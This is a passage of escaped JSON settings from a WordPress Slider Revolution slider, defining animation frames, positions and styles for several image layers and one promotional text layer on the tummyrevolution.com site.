To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Logo\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic81.png\",\"imageId\":4599},\"size\":{\"width\":{\"d\":{\"v\":\"850px\",\"e\":true},\"n\":{\"v\":\"720px\",\"e\":true},\"t\":{\"v\":\"720px\"},\"m\":{\"v\":\"306px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"150px\",\"e\":true},\"n\":{\"v\":\"127px\",\"e\":true},\"t\":{\"v\":\"127px\"},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":850,\"originalHeight\":150,\"aspectRatio\":{\"d\":{\"v\":5.666666666666667},\"n\":{\"v\":5.666666666666667},\"t\":{\"v\":5.666666666666667},\"m\":{\"v\":5.666666666666667}}},\"position\":{\"x\":{\"d\":{\"v\":\"-2px\",\"e\":true},\"n\":{\"v\":\"-3px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-50px\",\"e\":true},\"n\":{\"v\":\"-89px\",\"e\":true},\"t\":{\"v\":\"-91px\",\"e\":true},\"m\":{\"v\":\"-101px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Create a stunning online presentation that\\u2019s sure to be in perfect shape! Succulents lets you do this quickly & easily.\",\"alias\":\"It is a long establi...\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"559px\",\"e\":true},\"n\":{\"v\":\"532px\",\"e\":true},\"t\":{\"v\":\"532px\",\"e\":true},\"m\":{\"v\":\"313px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"559px\",\"originalHeight\":\"55px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-15px\",\"e\":true},\"n\":{\"v\":\"-11px\",\"e\":true},\"t\":{\"v\":\"-1px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"48px\",\"e\":true},\"n\":{\"v\":\"11px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"-10px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#c8c8c8\",\"e\":true},\"n\":{\"v\":\"#c8c8c8\",\"e\":true},\"t\":{\"v\":\"#c8c8c8\",\"e\":true},\"m\":{\"v\":\"#c8c8c8\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"v\":\"19px\",\"e\":true},\"t\":{\"v\":\"19px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"27px\",\"e\":true},\"n\":{\"v\":\"27px\",\"e\":true},\"t\":{\"v\":\"27px\",\"e\":true},\"m\":{\"v\":\"24px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#c8c8c8\",\"e\":true},\"n\":{\"v\":\"#c8c8c8\",\"e\":true},\"t\":{\"v\":\"#c8c8c8\",\"e\":true},\"m\":{\"v\":\"#c8c8c8\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"Image 8\",\"alias\":\"Image 8\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic51.png\",\"imageId\":4607},\"size\":{\"width\":{\"d\":{\"v\":\"194px\",\"e\":true},\"n\":{\"v\":\"167px\",\"e\":true},\"t\":{\"v\":\"201px\",\"e\":true},\"m\":{\"v\":\"91px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"183px\",\"e\":true},\"n\":{\"v\":\"158px\",\"e\":true},\"t\":{\"v\":\"190px\",\"e\":true},\"m\":{\"v\":\"86px\",\"e\":true}},\"originalWidth\":194,\"originalHeight\":183,\"aspectRatio\":{\"d\":{\"v\":1.0601092896174864},\"n\":{\"v\":1.0601092896174864},\"t\":{\"v\":1.0601092896174864},\"m\":{\"v\":1.0601092896174864}}},\"position\":{\"x\":{\"d\":{\"v\":\"100px\",\"e\":true},\"n\":{\"v\":\"-559px\",\"e\":true},\"t\":{\"v\":\"9px\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"262px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 9\",\"alias\":\"Image 9\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic61.png\",\"imageId\":4608},\"size\":{\"width\":{\"d\":{\"v\":\"127px\",\"e\":true},\"n\":{\"v\":\"99px\",\"e\":true},\"t\":{\"v\":\"99px\",\"e\":true},\"m\":{\"v\":\"69px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"77px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"42px\",\"e\":true}},\"originalWidth\":127,\"originalHeight\":77,\"aspectRatio\":{\"d\":{\"v\":1.6493506493506493},\"n\":{\"v\":1.6493506493506493},\"t\":{\"v\":1.6493506493506493},\"m\":{\"v\":1.6493506493506493}}},\"position\":{\"x\":{\"d\":{\"v\":\"534px\",\"e\":true},\"n\":{\"v\":\"-137px\",\"e\":true},\"t\":{\"v\":\"199px\",\"e\":true},\"m\":{\"v\":\"119px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"315px\",\"e\":true},\"t\":{\"v\":\"1px\",\"e\":true},\"m\":{\"v\":\"1px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"2\",\"scaleY\":\"2\",\"opacity\":\"0\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 